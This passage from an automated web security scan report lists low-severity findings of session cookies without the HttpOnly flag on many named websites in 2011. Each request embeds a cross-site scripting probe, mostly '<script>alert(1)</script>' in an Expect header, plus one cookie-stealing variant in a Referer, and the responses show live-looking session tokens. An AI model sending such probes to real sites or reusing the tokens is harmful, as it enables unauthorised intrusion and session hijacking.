_mrd.cookie='ref_=mr_7;' + _mr_ex + ';'+ 'path=/';_mrd.cookie='vid=206617824;' + _mr_ex + ';' + 'path=/';var _mrTrackLinks = new Array;

                   _mrScanLinks();
               

15.3. http://www.670kboi.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.670kboi.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.670kboi.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:20:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NON DSP COR OTPa OUR IND OTC"
Content-Length: 69
Content-Type: text/html
Set-Cookie: SiteUserIsBot=0; path=/
Set-Cookie: ASPSESSIONIDQQBRABAA=BNHOIALDDAGEHAJJKBFMKNBA; path=/
Cache-control: private
Set-Cookie: NSC_DjubefmTjuft=ffffffff09021e0745525d5f4f58455e445a4a423660;path=/

<br>Error, file not found: 404;http://www.670kboi.com:80/favicon.ico

15.4. http://www.aacounty.org/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.aacounty.org
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aacounty.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: CFID=5864381;expires=Fri, 26-Apr-2041 01:01:26 GMT;path=/
Set-Cookie: CFTOKEN=e4d609d290ad2e8b-35305FC3-BB15-85EC-1A4BD816BA4B877A;expires=Fri, 26-Apr-2041 01:01:26 GMT;path=/
Set-Cookie: SESESSIONID=D16AB137429E4C25B59E5C0CA72CBC00;path=/
Set-Cookie: SESESSIONCODE=93F8CA9DE393C6A2E5E648E7A8D760DE;path=/
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:01:25 GMT
Content-Length: 35343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

15.5. http://www.alaskaaircruises.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.alaskaaircruises.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.alaskaaircruises.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Date: Wed, 04 May 2011 04:04:17 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Location: /images_unique/blank.gif
Content-Length: 145
Content-Type: text/html
Set-Cookie: WDVID=%7BB72ADD1E%2D9AC1%2D49F2%2DAE72%2D648993F4883E%7D; path=/
Set-Cookie: WDUID=%7B41EC8529%2DB6ED%2D48E3%2D9774%2DC5D36F6597DE%7D; expires=Wed, 02-Feb-2022 05:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDQSQSAQTA=JNHJAGGAEHLAJAKHGIPLFANF; path=/
Cache-control: private
Set-Cookie: NSC_WJQ-XXX.BMBTLBBJSDSVJTFT.DPN=ffffffff095b1c1a45525d5f4f58455e445a4a423662;path=/

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/images_unique/blank.gif">here</a>.</body>

15.6. http://www.auristechnology.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.auristechnology.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.auristechnology.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Date: Wed, 04 May 2011 03:42:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.auris.com/home/
Content-Length: 147
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCABTTBSC=LMAJHJKDBNPJEJEAGPLOAIMF; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.auris.com/home/">here</a>.</body>

15.7. http://www.battleformarriage.net/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.battleformarriage.net
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.battleformarriage.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:45:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Server: Apache/2.2.3 (Linux/SUSE)
Vary: Accept-Encoding
Content-Language: en-US
Set-Cookie: CFID=25241475;expires=Fri, 26-Apr-2041 00:45:06 GMT;path=/
Set-Cookie: CFTOKEN=908d9d917a5766e4-B877228F-EC95-BD3A-60B04DA7B8EB5015;expires=Fri, 26-Apr-2041 00:45:06 GMT;path=/
Set-Cookie: FRCUID=;path=/
Content-Length: 14020

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<script language="JavaScript">
<!--
   document.cookie = 'jsEnabled=true; expires=Thu, 2 Aug 2050 20:47:1
...[SNIP]...

15.8. http://www.bauerfinancial.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bauerfinancial.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bauerfinancial.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 01:24:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 5906
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCARSATQR=AKBCLNNDJBOJJGCHABIOMGKI; path=/
Cache-control: private


<html>
<head>
<title>Page could not be found</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<link href="/shared/style.css" rel="stylesheet" type="text/css
...[SNIP]...

15.9. http://www.blackmonchevrolet.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.blackmonchevrolet.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blackmonchevrolet.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 301 Moved Permanently
Cache-Control: no-cache="Set-Cookie"
Date: Wed, 04 May 2011 03:40:04 GMT
Location: http://assets.cobaltnitra.com/websites/websitesEar/websitesWebApp/favicon.ico
Content-Length: 0
Set-Cookie: JSESSIONID=C46BNQKJ2JBm1yQ0WhdmJn0DK4v9fMRZHTqyBpmJSldHV06SRh8M!-113893168; path=/
Set-Cookie: visitorId=C46BNQKJ2JBm1yQ0WhdmJn0DK4v9fMRZHTqyBpmJSldHV06SRh8M; expires=Friday, 03-May-2013 03:40:05 GMT
Set-Cookie: sId=C46BNQKJ2JBm1yQ0WhdmJn0DK4v9fMRZHTqyBpmJSldHV06SRh8M; expires=Wednesday, 04-May-2011 04:10:05 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
X-Cache: MISS from backend02-2
X-Cache-Lookup: MISS from backend02-2:4002
X-Cache: MISS from frontend02
X-Cache-Lookup: MISS from frontend02:3128
Via: 1.0 backend02-2 (squid), 1.0 frontend02 (squid)
Proxy-Connection: keep-alive


15.10. http://www.bodybyvi.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bodybyvi.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bodybyvi.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: application/octet-stream; charset=utf-8
Expires: 4/27/2011 12:46:52 AM
Last-Modified: Thu, 05 May 2011 00:46:52 GMT
Location: /Resource/html/images/favicon.ico/usa/eng
Server: Microsoft-IIS/7.5
Set-Cookie: sessionid=1a916651e0cae33f411ab101390c4114; domain=.bodybyvi.com; path=/
X-Powered-By: SOLX
Date: Wed, 04 May 2011 00:46:51 GMT
Content-Length: 170

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fResource%2fhtml%2fimages%2ffavicon.ico%2fusa%2feng">here</a>.</h2>
</body></html>

15.11. http://www.brainshark.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.brainshark.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.brainshark.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404
Cache-Control: private
Content-Length: 6234
Content-Type: text/html
Expires: Tue, 01 Jan 1980 05:00:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDAADSDQBT=JLPJNBFALGBNJLFMBDFKDMGE; path=/
P3P: CP="NON DSP COR ADM DEV PSA IVA CONi TELi OUR BUS NAV"
Date: Wed, 04 May 2011 02:26:53 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Brainshark - Page Not Found</title>
<li
...[SNIP]...

15.12. http://www.bravocompanyusa.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bravocompanyusa.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bravocompanyusa.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 01:54:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1643
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCARRSSAA=MGPJBNODEIEAFPFNKFFDLCBA; path=/
Cache-control: private
Vary: Accept-Encoding, User-Agent


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head><title>The page cannot be found</title>
<meta http-equiv="Content-Type" content="text/htm
...[SNIP]...

15.13. http://www.brightwurks.com/monitor/76246353061db9d2b69ec5f5450fc29ac0efff78/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.brightwurks.com
Path:   /monitor/76246353061db9d2b69ec5f5450fc29ac0efff78/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /monitor/76246353061db9d2b69ec5f5450fc29ac0efff78/ HTTP/1.1
Host: www.brightwurks.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/favicon.icoa34c4%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E42602835c1e
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 00:45:13 GMT
Server: Apache/2.2.17 (Unix)
Set-Cookie: PHPSESSID=ekgsrvoeedr2lc4rj6glasoue4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Content-Length: 7579

<!DOCTYPE html>
<html lang="en">
<!--[if IE]><![endif]-->
<head>
   <meta charset="utf-8">
   <title>Brightwurks - Creators of Feed My Inbox and Help Scout</title>
<meta name="description" content="We bui
...[SNIP]...

15.14. http://www.burntorangereport.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.burntorangereport.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.burntorangereport.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 04 May 2011 00:58:21 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Set-Cookie: JSESSIONID=638B9590D2FC48DD88F23A048F09F94D; Path=/
ETag: W/"963-1190009741000"
Last-Modified: Mon, 17 Sep 2007 06:15:41 GMT
Content-Length: 963

GIF89a..................f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..
...[SNIP]...

15.15. http://www.carleasingsecrets.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.carleasingsecrets.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.carleasingsecrets.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 301 Moved Permanently
Date: Wed, 04 May 2011 03:29:53 GMT
Server: Apache/2.2.0 (Fedora)
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=di56scodbk81n7g725nltjv3v3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.carleasingsecrets.com/xmlrpc.php
Location: http://www.carleasingsecrets.com/favicon.ico/
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Connection: keep-alive


15.16. http://www.ccbg.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ccbg.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ccbg.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Location: https://www.ccbg.com/favicon.ico
Server: Microsoft-IIS/7.0
Set-Cookie: CFID=11283375;expires=Fri, 26-Apr-2041 01:57:07 GMT;path=/
Set-Cookie: CFTOKEN=8261e40de298c892-373AD3A3-E41F-133A-C2E0415C78A30A41;expires=Fri, 26-Apr-2041 01:57:07 GMT;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D11283375%26CFTOKEN%23%3D8261e40de298c892%2D373AD3A3%2DE41F%2D133A%2DC2E0415C78A30A41%23lastvisit%3D%7Bts%20%272011%2D05%2D03%2020%3A57%3A07%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D03%2020%3A57%3A07%27%7D%23hitcount%3D2%23cftoken%3D8261e40de298c892%2D373AD3A3%2DE41F%2D133A%2DC2E0415C78A30A41%23cfid%3D11283375%23;expires=Fri, 26-Apr-2041 01:57:07 GMT;path=/
Date: Wed, 04 May 2011 01:57:07 GMT
Content-Length: 0


15.17. http://www.cellphoneaccents.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cellphoneaccents.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cellphoneaccents.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 29256
Content-Type: text/html
Expires: Wed, 04 May 2011 00:54:27 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDSARADRQQ=OJIHEJKDLJLKNGNBLHDHHAIJ; path=/
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:54:26 GMT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></meta>
<title>Cell Phone Accessories . Di
...[SNIP]...

15.18. http://www.cheapbandgear.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cheapbandgear.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cheapbandgear.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 01:43:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1643
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAAQRRTBA=MFLHCNODHKEPBCDKGOGFLFLK; path=/
Cache-control: private
Vary: Accept-Encoding, User-Agent


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head><title>The page cannot be found</title>
<meta http-equiv="Content-Type" content="text/htm
...[SNIP]...

15.19. http://www.chickensoup.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.chickensoup.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.chickensoup.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 90652
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDASSTTSDT=GAAFJMLDBPNHDHENPAFAGDLD; path=/
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:04:27 GMT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<script type="text/javascript">

<!-- Begin
function popWindow(URL) {
...[SNIP]...

15.20. http://www.childrens.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.childrens.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.childrens.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 02:29:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=15178651;expires=Fri, 26-Apr-2041 02:29:17 GMT;path=/
Set-Cookie: CFTOKEN=36746025;expires=Fri, 26-Apr-2041 02:29:17 GMT;path=/
Content-Type: text/html; charset=UTF-8


               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<me
...[SNIP]...

15.21. http://www.cruiseone.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cruiseone.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cruiseone.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 File Not Found
Server: Microsoft-IIS/5.0
Date: Wed, 04 May 2011 00:53:40 GMT
Content-Length: 18
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSRCCSC=OAEBMKIBCDLCKEPAHOFMFECC; path=/
Cache-control: private

404 File Not Found

15.22. http://www.dairylandauto.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dairylandauto.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dairylandauto.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
Date: Wed, 04 May 2011 03:58:05 GMT
Vary: *
Set-cookie: NLSessionCwwwdairylandautocom=S5QjiK0Y3GEy8y7Amjyfhf8YRUyM6ZVOTixUZypIbSquzcDEIuszmWI/2EwchyDXe38Bx44236i4NUuFCBkLv7Pq4XN8E137zJ2NVCjmIdjaiCr0jsMUOCHwIeRQiFpr;path=/;domain=dairylandauto.com

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

15.23. http://www.dedicatedserverdir.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dedicatedserverdir.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dedicatedserverdir.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 04 May 2011 03:04:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.dedicatedserverdir.com/404.aspx
Content-Length: 0
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSCSADRD=OLOBIENDLNNNAHJFGEGAABPM; path=/
Cache-control: private


15.24. http://www.democratsenators.org/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.democratsenators.org
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.democratsenators.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8257B9014B8B6254BA10CE13B81D1A2D-n2; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 04 May 2011 02:15:27 GMT
Set-Cookie: Coyote-2-aae531e=aae52cb:0; path=/
Content-Length: 1167

<div id="404container" class="error404">
<h2>We're sorry--that page isn't here. You can use your back button to return to the previous page.</h2>


<p>It looks like you've requested a page that is cu
...[SNIP]...

15.25. http://www.directbuytire.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.directbuytire.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.directbuytire.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 04:15:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1643
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQSQQQSS=JKCBNNODJAOOBADDDNANHBLJ; path=/
Cache-control: private
Vary: Accept-Encoding, User-Agent


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head><title>The page cannot be found</title>
<meta http-equiv="Content-Type" content="text/htm
...[SNIP]...

15.26. http://www.disaboom.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.disaboom.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.disaboom.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/7.0
